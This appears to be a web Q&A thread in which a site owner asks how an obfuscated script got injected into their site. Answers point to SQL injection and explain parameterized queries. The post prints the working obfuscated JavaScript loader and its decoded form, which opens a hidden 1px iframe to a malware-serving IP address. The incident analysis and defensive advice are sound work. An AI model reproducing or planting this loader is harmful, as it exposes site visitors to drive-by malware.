The following code is being added to our site. Below it is the effect it has on a page, basically opening an iframe to a malware site. Our site was suffering from this last week and to fix the issue we just rolled back the database and codebase to fix the issue and it did. I have a corrupt version I can work with and am searching for where the code came in and how, but I'm coming up with nothing. If it was entered through some form on the site what might that entry look like in the db? If it modified a file in the codebase, why can't I find it? What should I be looking for? ANY insight into this would be super helpful. I'm trying to figure out where we need to plug up security.
Note: The original script had no line breaks. It is shown here with line breaks to make the code readable:
<script type="text/javascript" charset="utf-8">
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!6f!75!65!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!6f!75!65!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!32!31!36!2e!31!31!3@!2e!31!31!34!2e!31!36!34!2f!65!73!64!2e!70!68!70!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!68!6f!75!65!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!68!6f!75!65!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b"
.replace(/@/g,"9")
.split("!");
try{
document.body&=0.1
} catch(gdsgsdg) {
zz=3;
dbshre=103;
if(dbshre){
vfvwe=0;
try{
document;
} catch(agdsg){
vfvwe=1;
}
if(!vfvwe){
e=eval;
}
s="";
if(zz)
for(i=0;i-480!=0;i++){
if(window.document)
s+=ss(p(asgq[i],16));
}
if(window.document)
e(s);
}
}
</script>
The embedded hex codes resolve to the following Javascript:
(function () {
var houe = document.createElement('iframe');
houe.src = 'http://216.119.114.164/esd.php';
houe.style.position = 'absolute';
houe.style.border = '0';
houe.style.height = '1px';
houe.style.width = '1px';
houe.style.left = '1px';
houe.style.top = '1px';
if (!document.getElementById('houe')) {
document.write('<div id=\'houe\'></div>');
document.getElementById('houe').appendChild(houe);
}
})();
It is injecting div elements such as:
<div id="mgkc"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>
<div id="houe"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>
How do the forms on your site interact with your database? Do they create a direct connection to the DB or do they use a web service? If you are executing queries directly on the DB, then you should parameterize your queries.
What should I be looking for?
Assuming it is an sql injection problem (and this does sound right), you should be looking in your web application code for something like this:
sql = "SELECT columns FROM SomeTable WHERE SomeColumn=" + someVariable
If you let us know what language you use I might be able to give a more representative example, but the main thing is that anywhere you use string concatenation to put information from the user into an sql query — even if you run it through a function to sanitize, clean, or escape it — you are vulnerable. Note that this isn't even an insert/update/delete statement. It's just a select, and the semantics indicate that the sql is even expecting a numeric type. It doesn't matter: an attacker can still use this to change things in your data.
If you're using an ORM, you might even just be building one part of a WHERE clause, and so it might even just be this:
filter = "SomeDataField='" + someVariable + "'"
The correct way to handle it is using something called parameterized queries or prepared statements, depending on which kids you hang out with on the playground. These use code that looks more like this:
sql = "SELECT columns" + " FROM SomeTable WHERE SomeColumn= ?"
// Other code to define and set a parameter for SomeColumn goes here
Note that I did use string concatenation there (just for show, to demonstrate that you can build up a query this way), but that I did not use it substitute user input into the query. The important thing to understand here is that using this scheme (if implemented properly), the user input is never substituted directly into the query, not even on the database server. Instead, it's transmitted separately and treated like a variable by the database engine as well.
Again, I might be able to give a better representation if I know what language/platform you're using. As an example (I'll use an UPDATE this time), here's one way to do it safely in C# with Sql Server:
string sql = "UPDATE table SET column= @SomeVariable WHERE ID= @UserID";
using (var cn = new SqlConnection("connection string here"))
using (var cmd = new SqlCommand(sql, cn))
{
cmd.Parameters.Add("@SomeVariable", SqlDbType.VarChar, 50).Value = someVariable;
cmd.Parameters.Add("@UserID", SqlDbType.Int).Value = UserID;
cn.Open();
cmd.ExecuteNonQuery();
}
There are multiple website vulnerability scanners that test for SQL injection and other vulnerabilities on websites. Here is a short list - check https://security.stackexchange.com/questions/32/what-tools-are-available-to-assess-the-security-of-a-web-application/38#38 for a larger one:
Additionally also see these links:
In general, you need to also do a search for every SQL command within your codebase and verify that no inputs are being sent unsanitized to the database.